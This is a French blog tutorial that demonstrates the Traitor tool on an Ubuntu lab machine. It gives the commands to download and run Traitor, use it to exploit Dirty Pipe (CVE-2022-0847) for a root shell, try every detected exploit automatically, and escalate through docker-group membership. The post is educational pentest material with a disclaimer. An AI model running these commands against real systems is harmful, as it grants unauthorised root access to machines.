Traitor – Automatiser la détection et l’escalade de privilèges (Démonstration avec la faille Dirty Pipe [CVE-2022-0847])

Traitor – Automatiser la détection et l’escalade de privilèges (Démonstration avec la faille Dirty Pipe [CVE-2022-0847])

Rappel : L’article qui va suivre contient des techniques et méthodes qui peuvent s’avérer être illégales et dangereuses si elles sont utilisées à mauvais escient. Ce tutoriel ne doit en aucun cas être utilisé contre un particulier, une entreprise, une organisation à but non lucratif ou une administration publique de quelconque pays. Je me dédouane de toute responsabilité en cas de problèmes ou d’incidents de quelque nature que ce soit après le visionnage de cet article.

« I have a dream… that one day I will found a detection and privilege escalation automatic tool for Linux… ». C’est chose faite, j’ai découverts il y a peu un outil qui est en mesure de réaliser ce rêve.

Si vous me suivez depuis quelque temps, vous connaissez sans doute maintenant mon appétence pour les automatisations en tout genre… Cet article vous présente un outil permettant de réaliser une escalade de privilèges sous linux « on the fly » sans le moindre effort (ou presque).

Lien vers le projet GitHub : https://github.com/liamg/traitor

I. Disclaimer

Attention, lors de vos phases de test et plus précisément à chaque fois que vous exécutez du code provenant d’un repository GitHub ou autre, renseignez-vous un minimum sur ce que fait cet artefact, et qui est à l’origine du projet. Pour cela consultez les avis sur internet, les issues GitHub, et parcourez rapidement la documentation. Vous n’êtes jamais à l’abris d’exécuter un bout de code qui pourrait endommager votre système voir pire, être malveillant… Respectez à la lettre le principe du « Zero-Trust » le plus souvent possible afin de limiter votre surface d’exposition à la menace cyber.

à méditer…

I. Environnement

  • Ubuntu 20.04.3
    • Accès internet
    • Compte utilisateur standard pour la démonstration : tintin

II. Démonstration

Afin d’avoir un exemple parlant, je vais vous démontrer la puissance de Traitor en exploitant la faille Dirty Pipe (CVE-2022-0847 – CVSS : 7.8 (High)), qui vous permet de réaliser une escalade de privilèges (lors d’une phase de post exploitation). Pour plus d’informations concernant cette faille je vous invite à consulter l’article d’un de mes confrères :

Commencez, par télécharger l’outil par l’intermédiaire de la commande wget. J’attire votre attention sur le fait que la version de cet outil changera à l’avenir. Je vous invite à vous reporter au repository GitHub, ci-dessous, pour obtenir la dernière version.

wget https://github.com/liamg/traitor/releases/download/v0.0.14/traitor-amd64

Ajoutez des droits d’exécution au fichier :

chmod u+x traitor-amd64

Puis, exécutez-le :

./traitor-amd64

Traitor a détecté que notre système est potentiellement vulnérable aux failles de sécurité suivantes :

  • Polkit (CVE-2021-3560)
  • Dirty Pipe (CVE-2022-0847)

Il se base notamment sur la version du noyau Linux et de la version qu’il peut trouver. Ex : Ubuntu 20.04.X

Je vais tenter mon escalade de privilèges sur le système avec l’exploit « embarqué » de Traitor pour la faille Dirty Pipe (CVE-2022-0847). Saisissez la commande suivante :

./traitor-amd64 --exploit kernel:CVE-2022-0847

Comme vous pouvez le constater, le système en question est bel et bien vulnérable à « Dirty Pipe » puisque l’escalade de privilèges a fonctionné. Vous obtenez donc un shell basique (sh) root, que vous pouvez polymorpher en shell bash en saisissant /bin/bash.

III. Détection et escalade de privilèges en une ligne ?

Oui oui, je sais ça parait comment dire… prétentieux, outrecuidant, voir même insolent et utopiste ^^ mais traitor a une option qui vous permet de réaliser cela. L’option -a permet de tester tous les exploits qui ont été identifiés comme exploitables par traitor.

./traitor-amd64 -a

Comme vous pouvez le constater, traitor n’arrive pas à privesc avec la faille polkit, du coup il utilise la faille Dirty Pipe (CVE-2022-0847) pour vous permettre d’obtenir un shell root. Que dire de plus… ^^ Je pense que cet outil a de très beaux jours devant lui, il n’a même pas un an. Le développeur qui maintient ce repository actualise son outil dès qu’une CVE intéressante et facilement exploitable est rendu publique. L’intégration de la CVE-2022-0847 est une preuve concrète.

Pour plus d’informations concernant cette commande, consultez son manuel :

./traitor-amd64 --help

IV. Bonus : Escalade de privilèges via la présence d’un utilisateur dans le groupe docker avec traitor

Pour comprendre un peu plus en détail le fonctionnement de cette faille, je vous invite à consulter mon précédent article consacré à ce sujet :

Via le compte de votre machine vulnérable, ajoutez un utilisateur standard (dans mon cas tintin) au groupe docker. Testez in fine, si celui-ci accède à la commande docker sans encombre. (message d’erreur explicite)

Exécutez traitor :

Comme l’indique la capture ci-dessus, traitor a bel et bien détecté que le système autorise un autre utilisateur (tintin) que root à accéder à la commande.

Rien de plus simple que de lancer la commande suivante afin de profiter de cette brèche de sécurité pour devenir root.

J’espère que cet article vous aura plu. ^^

++

Geoffrey

Geoffrey Sauvageot-Berland

Related Posts

Analyser la sécurité de vos images docker avec Trivy (mais pas que !)

Analyser la sécurité de vos images docker avec Trivy (mais pas que !)

Stratégies d’offuscation/contournement de pare-feu et IDS

Stratégies d’offuscation/contournement de pare-feu et IDS

Exploiter une vulnérabilité critique avec Metasploit (vsftpd 2.3.4)

Exploiter une vulnérabilité critique avec Metasploit (vsftpd 2.3.4)

Créer un référentiel APT et l’héberger sur GitHub (Debian/Ubuntu PPA)

Créer un référentiel APT et l’héberger sur GitHub (Debian/Ubuntu PPA)

Abonnez-vous à ce blog par e-mail.

Abonnez-vous et recevez un email à chaque nouvel article.

Rejoignez les 592 autres abonnés
Pour soutenir ce blog ❤️⬇️

Buy Me a Coffee

Membre de l’Internet Defense League

Catégories

Articles en vogue